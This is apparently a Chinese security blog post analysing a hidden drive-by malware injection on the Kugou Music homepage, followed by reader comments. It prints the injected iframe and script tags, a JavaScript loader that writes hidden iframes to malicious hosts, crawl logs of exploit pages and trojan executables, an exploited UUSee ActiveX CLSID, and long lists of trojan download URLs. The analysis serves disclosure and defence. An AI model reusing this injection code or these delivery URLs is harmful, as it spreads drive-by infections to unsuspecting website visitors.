酷狗音乐首页隐蔽挂马详细分析+72只马

作者: yimike
来源: 剑盟

近来有朋友反映酷狗音乐首页挂马,而且奇怪的是只有第一次访问该页时杀软会提示挂马;之后除非换IP,否则无论怎么刷新杀软都不会提示网页挂马。于是循着这个线索,打开了酷狗音乐首页(h**p://www.kugou.com/home),最终找到了极其隐蔽的挂马。

详细过程如下:

1.h**p://www.kugou.com/home该页面代码看似正常,但是有个看起来比较正常但是却比较隐蔽的iframe,代码如下:

<IFRAME marginWidth=0 marginHeight=0 src=”cairing.htm” frameBorder=0 width=230 scrolling=no height=327></IFRAME>

这里的cairing.htm指向的是h**p://www.kugou.com/home/cairing.htm

2.每个独立IP首次访问h**p://www.kugou.com/home/cairing.htm这个页面时,源代码里会有一段代码如下:

<IFRAME id=cif123 src=”h**p://count12.5lyes.net/sa.aspx?s1=0&s2=1214155605&s3=82585631941791&s4=1001282043&s5=621d5&n=0.5986579168677271″ width=0 height=0></IFRAME>
<SCRIPT language=javascript id=clickjs src=”h**p://service.o00o.cn:8082/click.aspx?sid=ad_3001″></SCRIPT>

相同IP再次访问该页时则不会有该段代码,也就是说酷狗音乐首页的挂马很可能跟此有关。

3.某IP首次访问h**p://service.o00o.cn:8082/click.aspx?sid=ad_3001这个个页面时,会读取本地coockies,检查是否登陆过酷狗,然后获取酷狗ID等。
根据这些信息,生成一个iframe,并写入。这个IFRAME,也就是第2步中的51yes的那行代码了。
于是访问该行iframe。

4.就在访问该iframe中src的地址时,收到了一个奇怪的无关链接:
h**p://qq.bcccd.com/11214155595_19024924457258_1001282043_9b9570a2a3268104abea8c96b5799630.html
查看该数据包,详情如下:

注意看黄色高亮部分,也就是说上面这个无关连接引用自51yes.net的链接,也就是第二部中的iframe的地址。
通俗点的理解就是,当访问第2部中的指向51yes.net的iframe时,51yes.net的服务器返回了这个“无关”链接。

5.紧追该“无关”链接,得到的代码是:

<script type=”text/javascript”>
//window.setTimeout(‘goo();’,1*60*1000);
goo();
function goo()
{
document.write(‘<iframe width=100 height=100 border=0 src=”h**p://ok.dessp.com/mmmgo.htm”></iframe>’);
document.write(‘<iframe width=100 height=100 border=0 src=”h**p://ie.ietop.com/ms.htm”></iframe>’);
document.write(‘<iframe width=100 height=100 border=0 src=”h**p://arp.aafrp.com/mmmmgo.htm”></iframe>’);
document.write(‘<iframe width=100 height=100 border=0 src=”h**p://mm1.yaoch.com/mmgo.htm”></iframe>’);
//document.write(‘<iframe width=100 height=100 border=0 src=”h**p://ok.dessp.com/m21214155595_23735419533072_1001282043_f91277f09fe5814ae062efc4cfff348f.html”></iframe>’);
//document.write(‘<iframe width=100 height=100 border=0 src=”h**p://mm1.yaoch.com/m1214155595_23735419533072_1001282043_f91277f09fe5814ae062efc4cfff348f.html”></iframe>’);
//document.write(‘<iframe width=100 height=100 border=0 src=”h**p://arp.aafrp.com/s1214155595_23735419533072_1001282043_f91277f09fe5814ae062efc4cfff348f.html”></iframe>’);
document.write(‘<script src=”h**p://service.o00o.cn:8081/click.aspx?id=test_2″><\/script>’);
}</script>
<script src=’h**p://s35.cnzz.com/stat.php?id=817650&web_id=817650′ language=’JavaScript’ charset=’gb2312′></script>

此时,酷狗音乐首页挂马的原因已经明晰。此次挂马是由两点引起的:

1.h**p://www.kugou.com /home/cairing.htm被植入恶意代码:<SCRIPT language=javascript id=clickjs src=”h**p://service.o00o.cn:8082/click.aspx?sid=ad_3001″></SCRIPT>
2.计数站点5lyes.net的sa.aspx的代码可能代码被黑客入侵后遭受了恶意修改;或者是机房存在arp病毒导致sa.aspx被感染恶意代码(后者可能性不大)

PS.以上部分链接需要结合本地coockies才能访问

下面分析下挂的马:>

Log is generated by FreShow
[wide]http://ok.dessp.com/mmmgo.htm
[frame]http://www.jsp369.cn/a1.htm
[frame]http://www.regedit369.cn/index.htm
[frame]http://www.regedit369.cn/Ms06014.htm
[object]http://d.yuku369.cn/max.exe
[frame]http://www.regedit369.cn/cuteqq.htm
[frame]http://www.regedit369.cn/Ajax.htm
[object]http://d.yuku369.cn/max.exe
[frame]http://www.regedit369.cn/Ms06014.htm
[object]http://d.yuku369.cn/max.exe
[script]http://www.regedit369.cn/Real11.gif
[object]http://d.yuku369.cn/max.exe
[script]http://www.regedit369.cn/Real.gif
[object]http://d.yuku369.cn/max.exe
[frame]http://www.regedit369.cn/Bfyy.htm
[object]http://d.yuku369.cn/max.exe
[frame]http://www.regedit369.cn/Lz.htm
[object]http://d.yuku369.cn/max.exe
[frame]http://www.regedit369.cn/flash.htm
[frame]http://www.regedit369.cn/ilink.html
[object]http://www.regedit369.cn/i115.swf
[object]http://www.regedit369.cn/i64.swf
[object]http://www.regedit369.cn/i47.swf
[object]http://www.regedit369.cn/i45.swf
[object]http://www.regedit369.cn/i28.swf
[object]http://www.regedit369.cn/i16.swf
[frame]http://www.regedit369.cn/flink.html
[object]http://www.regedit369.cn/i115.swf
[object]http://www.regedit369.cn/i64.swf
[object]http://www.regedit369.cn/i47.swf
[object]http://www.regedit369.cn/i45.swf
[object]http://www.regedit369.cn/i28.swf
[object]http://www.regedit369.cn/i16.swf
[frame]http://www.regedit369.cn/uuc.htm
[frame]http://www.regedit369.cn/UU.ini
[object]http://d.yuku369.cn/UUSee.CAB

Log is generated by FreShow.
[wide]http://ie.ietop.com/ms.htm
[frame]http://www.worka.net.cn/a1.html
[frame]http://www.worka.net.cn/add.html
[frame]http://www.flashl.net.cn/lg.html
[frame]http://www.flashp.net.cn/1.html
[object]http://www.sarvt.cn/google.exe
[frame]http://www.flashp.net.cn/l.html
[object]http://www.sarvt.cn/google.exe
[frame]http://www.flashp.net.cn/bf.html
[frame]http://www.flashp.net.cn/UUUpgrade.ini
[object]http://www.flashp.net.cn/UUSee.CAB
[frame]http://www.flashp.net.cn/r.html
[object]http://www.sarvt.cn/google.exe
[frame]http://www.flashp.net.cn/nr.html
[object]http://www.sarvt.cn/google.exe
[object]http://www.tygvb.cn/4562.swf
[object]http://www.tygvb.cn/4561.swf

Log is generated by FreShow.
[wide]http://arp.aafrp.com/mmmmgo.htm
[frame]http://cv.vkhys.org.cn/vkhys/aa1.htm
[frame]http://cv.vkhys.org.cn/f.htm
[frame]http://cv.vkhys.org.cn/ilink.html
[object]http://cv.vkhys.org.cn/i115.swf
[object]http://cv.vkhys.org.cn/i64.swf
[object]http://cv.vkhys.org.cn/i47.swf
[object]http://cv.vkhys.org.cn/i45.swf
[object]http://cv.vkhys.org.cn/i28.swf
[object]http://cv.vkhys.org.cn/i16.swf
[frame]http://cv.vkhys.org.cn/flink.html
[object]http://cv.vkhys.org.cn/f115.swf
[object]http://cv.vkhys.org.cn/f64.swf
[object]http://cv.vkhys.org.cn/f47.swf
[object]http://cv.vkhys.org.cn/f45.swf
[object]http://cv.vkhys.org.cn/f28.swf
[object]http://cv.vkhys.org.cn/f16.swf
[frame]http://cv.vkhys.org.cn/bx14.htm
[object]http://dm.xcvgj.org.cn/gd.exe
[frame]http://cv.vkhys.org.cn/r10.htm
[object]http://dm.xcvgj.org.cn/gd.exe
[frame]http://cv.vkhys.org.cn/r11.htm
[object]http://dm.xcvgj.org.cn/gd.exe
[frame]http://cv.vkhys.org.cn/bxlz.htm
[object]http://dm.xcvgj.org.cn/gd.exe

Log is generated by FreShow.
[wide]http://mm1.yaoch.com/mmgo.htm
[frame]http://aaa.udd05.cn/xb.htm(找不到该页)

以上挂马中值得注意的是,近期新爆UUSEE网络电视的漏洞已经广泛被用于挂马,涉及的CLSID是2CACD7BB-1C59-4BBB-8E81-6E83F82C813B,请UUSEE用户重新到官网下载最新的UUSEE安装包重新安装或者是卸载UUSEE。
所挂的马中,max.exe和uusee.cab解压后的exe下马相同,google.exe和uusee.cab解压后exe的MD5相同,gd.exe不是下载者,不下载木马。

max.exe连接到http://d.yuku369.cn/ble1.txt,下载35只木马:

h**p://jan1.fdsjan.cn/max1.exe
h**p://jan1.fdsjan.cn/max2.exe
h**p://jan1.fdsjan.cn/max3.exe
h**p://jan1.fdsjan.cn/max4.exe
h**p://jan1.fdsjan.cn/max5.exe
h**p://jan1.fdsjan.cn/max6.exe
h**p://jan1.fdsjan.cn/max7.exe
h**p://jan1.fdsjan.cn/max8.exe
h**p://jan1.fdsjan.cn/max9.exe
h**p://jan1.fdsjan.cn/max10.exe
h**p://jan1.fdsjan.cn/max11.exe
h**p://jan1.fdsjan.cn/max12.exe
h**p://jan1.fdsjan.cn/max13.exe
h**p://jan1.fdsjan.cn/max14.exe
h**p://jan1.fdsjan.cn/max15.exe
h**p://jan1.fdsjan.cn/max16.exe
h**p://jan1.fdsjan.cn/max17.exe
h**p://jan1.fdsjan.cn/max18.exe
h**p://jan1.fdsjan.cn/max19.exe
h**p://jan1.fdsjan.cn/max20.exe
h**p://www.fdsjan.cn/max21.exe
h**p://www.fdsjan.cn/max22.exe
h**p://www.fdsjan.cn/max23.exe
h**p://www.fdsjan.cn/max24.exe
h**p://www.fdsjan.cn/max25.exe
h**p://www.fdsjan.cn/max26.exe
h**p://www.fdsjan.cn/max27.exe
h**p://www.fdsjan.cn/max28.exe
h**p://www.fdsjan.cn/max29.exe
h**p://www.fdsjan.cn/max30.exe
h**p://www.fdsjan.cn/max31.exe
h**p://www.fdsjan.cn/max32.exe
h**p://www.fdsjan.cn/max33.exe
h**p://www.fdsjan.cn/max34.exe
h**p://www.fdsjan.cn/max35.exe

其中34、35文件不存在,下到33只

google.exe下载35只:

h**p://www.irwxg.cn/down/e1.exe
h**p://www.irwxg.cn/down/r2.exe
h**p://www.irwxg.cn/down/a3.exe
h**p://www.irwxg.cn/down/j4.exe
h**p://www.irwxg.cn/down/y5.exe
h**p://www.irwxg.cn/down/m6.exe
h**p://www.irwxg.cn/down/r7.exe
h**p://www.irwxg.cn/down/i8.exe
h**p://www.irwxg.cn/down/x9.exe
h**p://www.irwxg.cn/down/l10.exe
h**p://www.rwxow.cn/down/b11.exe
h**p://www.rwxow.cn/down/z12.exe
h**p://www.rwxow.cn/down/m13.exe
h**p://www.rwxow.cn/down/n14.exe
h**p://www.rwxow.cn/down/o15.exe
h**p://www.rwxow.cn/down/g16.exe
h**p://www.rwxow.cn/down/j17.exe
h**p://www.rwxow.cn/down/l18.exe
h**p://www.rwxow.cn/down/c19.exe
h**p://www.rwxow.cn/down/t20.exe
h**p://www.werxv.cn/down/p21.exe
h**p://www.werxv.cn/down/x22.exe
h**p://www.werxv.cn/down/m23.exe
h**p://www.werxv.cn/down/o24.exe
h**p://www.werxv.cn/down/b25.exe
h**p://www.werxv.cn/down/e26.exe
h**p://www.werxv.cn/down/v27.exe
h**p://www.werxv.cn/down/m28.exe
h**p://www.werxv.cn/down/u29.exe
h**p://www.werxv.cn/down/h30.exe
h**p://www.werxv.cn/down/b31.exe
h**p://www.werxv.cn/down/c32.exe
h**p://www.werxv.cn/down/u33.exe
h**p://www.werxv.cn/down/f34.exe
h**p://www.werxv.cn/down/p35.exe

全部链接有效,下到35只。

除swf外,全部样本共计72只:mm.7z (923.12 KB)

至此,酷狗音乐首页挂马分析清楚。

——————————————————————–

再多说几句,某些迹象表明此次挂马事件与cuteqq难脱干系。
cuteqq是什么,百度一下就知道。对此,只想说:多行不义必自毙。
而酷狗前几天刚修复了一个aspx感染恶意代码的问题,现在又发现挂马。
从中可以看出酷狗官方对自己所肩负的网络安全责任的漠视。
希望酷狗官方正视自己的问题和不足,对用户负责,尽快修正挂马,弥补网站管理漏洞。

相关日志

楼被抢了 3 层了... 抢座Rss 2.0或者 Trackback

  • Mao

    才重装好系统..幸好没上酷狗

  • aaabbbcc

    前半年的时侯,就发觉了酷狗音乐首页被挂马了,现在还一真被挂着,真的很牛.

  • cy

    为什么就没人相信是kugoo官方自己挂的,据我看到的,它一天80W,IP

发表评论